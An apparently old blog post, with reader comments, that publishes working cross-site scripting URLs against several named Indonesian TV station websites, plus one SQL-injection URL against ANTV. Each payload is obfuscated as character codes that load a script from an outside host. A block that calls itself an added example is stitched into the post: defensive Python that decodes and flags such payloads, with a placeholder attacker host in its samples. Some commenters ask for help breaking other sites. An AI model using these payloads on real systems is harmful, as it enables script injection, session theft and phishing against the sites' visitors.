XSS On Indo TV Stations

Posted by: Joy : Category: Vulnerability

Here, we're gonna show you XSS (Cross-Site Scripting) and XFS (XSS From SQLi) bugs on some Indonesian TV station websites.

As you might already know, cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites was roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end user, who may be subject to unauthorized access, theft of sensitive data, and financial loss (taken from Wikipedia).

Here are some examples of their vulnerable URLs:

= TransTV =

http://transtv.co.id/200706/sinopsispers.asp (Patched)

http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= SCTV =

http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E

= Indosiar =

http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= GlobalTV =

http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E

= TVRI =

http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= ANTV =

This is the worst among them: their site is vulnerable to both XSS and SQL injection. But, as the topic of this post is only XSS, we will only show you the XFS (XSS From SQLi) on their site:
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-
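All of the payloads above, the reflected ones and the UNION SELECT char(...) one, hide the injected markup behind a list of character codes, so a plain string match on "<script" in the access log misses them. The following is an added defender-side example, not code from the original post: it URL-decodes request lines, decodes any fromCharCode/char() list, flags what the parameters carry, and shows the output-encoding fix for the reflected cases. The log lines and the host attacker.example are constructed placeholders.

```python
# Added example (not from the post): decode char-code-obfuscated injection in request logs.
import html
import re
from urllib.parse import unquote_plus

# The reflected payloads and the UNION SELECT char(...) variant both build
# their markup from a comma-separated list of character codes.
CHARCODE_RE = re.compile(r"(?:String\.fromCharCode|\bchar)\s*\(\s*([\d\s,]+)\)", re.I)
SCRIPT_RE = re.compile(r"<\s*script\b", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def decode_charcodes(codes: str) -> str:
    """Turn '60,115,...' (whitespace tolerated) into the string it builds."""
    return "".join(chr(int(n)) for n in codes.replace(" ", "").split(",") if n)

def analyse_request(request_line: str) -> dict:
    """URL-decode one request line and report what its parameters carry."""
    decoded = unquote_plus(request_line)
    payloads = [decode_charcodes(m) for m in CHARCODE_RE.findall(decoded)]
    findings = []
    if SCRIPT_RE.search(decoded):
        findings.append("script-tag")        # literal <script> in a parameter
    if UNION_RE.search(decoded):
        findings.append("sqli-union")        # UNION SELECT in a parameter
    if any(SCRIPT_RE.search(p) for p in payloads):
        findings.append("charcode-script")   # markup hidden behind char codes
    return {"decoded": decoded, "payloads": payloads, "findings": findings}

def scan_logs(lines):
    """Return (line, findings) for every request line that trips a check."""
    hits = []
    for line in lines:
        findings = analyse_request(line)["findings"]
        if findings:
            hits.append((line, findings))
    return hits

def safe_echo(term: str) -> str:
    """The fix for the reflected cases: HTML-encode input before echoing it."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"

def _codes(text: str) -> str:
    return ",".join(str(ord(c)) for c in text)

# Constructed sample requests; attacker.example is a placeholder host.
INJECTED = '<script src="http://attacker.example/x.js"></script>'
SAMPLE_LOGS = [
    "GET /search.php?s=jadwal+acara HTTP/1.1",
    "GET /search.php?s=%3Cscript%3Edocument.write(String.fromCharCode("
    + _codes(INJECTED) + "))%3C/script%3E HTTP/1.1",
    "GET /s/?sid=null+union+select+char(" + _codes(INJECTED) + "),0-- HTTP/1.1",
]
```

Running scan_logs(SAMPLE_LOGS) flags the second and third requests and leaves the ordinary search alone; the decoded payloads show the script tag the character codes were hiding.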

Let's make Indonesian sites better. ;)


8 Responses to “XSS On Indo TV Stations”

  1. Candra Says:

    Hopefully the webmasters of the sites in question find out.

  2. Pintuz Says:

    Cool… nice one.
    petramax^^

  3. Black Shell Says:

    Joy, you really are awesome,,,
    hahahaha

  4. Rio Says:

    Weits, UNBELIEVABLE I ♥ Mr. Joy :)

  5. Rio Says:

    Mr. Joy, I want to know the latest XSS on FS comments, huhu. Thanks a lot, can you get past (break through) it? heh

    Off-topic? Why did your FS get suspended, bro? huhu

  6. heri Says:

    Bro, how do you make a website like this……..
    it's really nice…….

  7. Joy Says:

    @rio
    comment linker? Sorry to say that, for our safety, whether it's available or not, there's no more comment linker in public. Ah yes :D my profile was suspended because of the no_one widget v2, I'm more into FB now ;)

    @heri
    This one is based on WordPress, bro Heri, it just needs tweaking.. :)

  8. kopies Says:

    Awesome bro..

    Teach me the FB one please. ahhahaa.
    You already have my email. heheh.
